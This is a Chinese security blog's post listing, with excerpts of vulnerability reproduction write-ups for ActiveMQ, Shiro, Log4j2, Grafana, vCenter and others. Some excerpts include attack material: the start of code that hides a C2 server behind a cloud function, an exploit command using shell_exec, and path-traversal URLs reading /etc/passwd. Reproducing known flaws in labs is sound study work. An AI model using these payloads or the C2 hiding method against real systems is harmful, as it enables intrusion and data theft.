自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 云函数隐匿C2服务器

第一步,创建云函数登录腾讯云平台,访问云函数功能链接:https://console.cloud.tencent.com/scf/list?rid=8&ns=default。点击新建,创建方式选择自定义创建。函数名称可以自定义进行设置,主要是函数代码部分,将下面内容复制到函数代码中:# -*- coding: utf8 -*-import json,requests,base64def main_handler(event, context): C2='http://<C

2022-03-04 13:13:07 7267

原创 ActiveMQ任意文件写入漏洞(CVE2016-3088)

漏洞说明该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。影响版本Apache ActiveMQ 5.0.0 - 5.13.2漏洞环境搭建漏洞复现浏览器访问ip:8161;如下图可以看出成功搭建访问..

2022-02-11 11:06:52 306

原创 (CVE-2016-4437) Apache Shiro 反序列化漏洞 复现

一、漏洞描述Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。二、漏洞影响只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。三、环境搭建cd CVE-2016-4437/docker-compose up -d四、漏洞复现访问靶机ip使用工具进行半自动化注入检测shell成功写入,使用冰蝎.

2022-02-08 14:23:10 3307

原创 Apache HTTPD 换行解析 (CVE-2017-15715漏洞复现)

CVE-2017-15715漏洞介绍ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页在2.4.0~2.4.29版本存在一个解析漏洞,在解析php时,1.php\x0A将按照php后缀进行解析,导致绕过一些服务器的安全策略漏洞复现编译及运行漏洞环境cd vulhub-master/httpd/CVE-2017-15715docker-compose builddocker-compose up -d用本机访问下http://192.168.

2022-02-08 12:17:14 2406

原创 (CVE-2021-21972)Vmware vcenter未授权任意文件上传

一、漏洞简介VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。高危严重漏洞:在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中,攻击者可直接通过443端口构造恶意请求,执行任意代码,控制vCenter。漏洞为任意文件上传:存在问题的接口为/ui/vropspluginui/rest/services/uploadova,完整路径(https://ip:port/ui/vropsplug..

2022-01-10 15:32:35 2814

原创 XDebug 远程调试漏洞复现(代码执行)

环境搭建启动dockersystemctl start docker进入对应目录cd vulhub/php/xdebug-rce/启动容器docker-compose up -d查看容器docker ps访问8080端口(搭建成功)在本机执行expexp的位置在vulhub/php/xdebug-rce/目录下(成功执行)python3 exp.py -t http://10.106.8.91:8080/index.php -c 'shell_exec..

2022-01-10 11:47:42 2959 1

原创 (CVE-2021-43798)Grafana任意文件读取漏洞复现

1、漏洞描述Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。2.验证poc/public/plugins/welcome/../../../../../../../../../etc/passwd/public/plugins/alertlist/..%2f..%2

2022-01-10 11:21:49 869

原创 Apache Log4j2漏洞复现(反弹shell)

0x01 漏洞描述Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安

2022-01-10 09:17:17 1839

转载 Apache ShenYu JWT认证缺陷绕过漏洞 (CVE-2021-37580)

0x00 漏洞详情Apache ShenYu(原名 Soul)是一个异步的、跨语言的、多协议的高性能响应式API 网关,并可应用于所有微服务场景。2021 年 11 月 16日,Apache发布安全公告,公开了Apache ShenYu中的一个身份验证绕过漏洞(CVE-2021-37580),该漏洞的CVSS评分为9.8。由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。0x01 影响范围Apache ShenYu 2.3.0

2021-12-31 15:34:33 506

原创 Apache APISIX Dashboard 身份验证绕过漏洞 (CVE-2021-45232)

0x00 漏洞描述Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。CVE-2021-45232该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但

2021-12-31 15:32:28 3307 1

原创 Apache Druid LoadData 任意文件读取漏洞(CVE-2021-36749)

0x00 漏洞详情由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTPInputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。0x01 fofa语法title="Apache Druid"0x02 漏洞复现主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读.

2021-12-31 15:29:31 1353

原创 CVE-2019-0193漏洞复现:Apache Solr 远程命令执行漏洞复现

0X00漏洞简介CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞0X01漏洞原因Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档  在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置

2021-12-23 11:12:09 1617

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除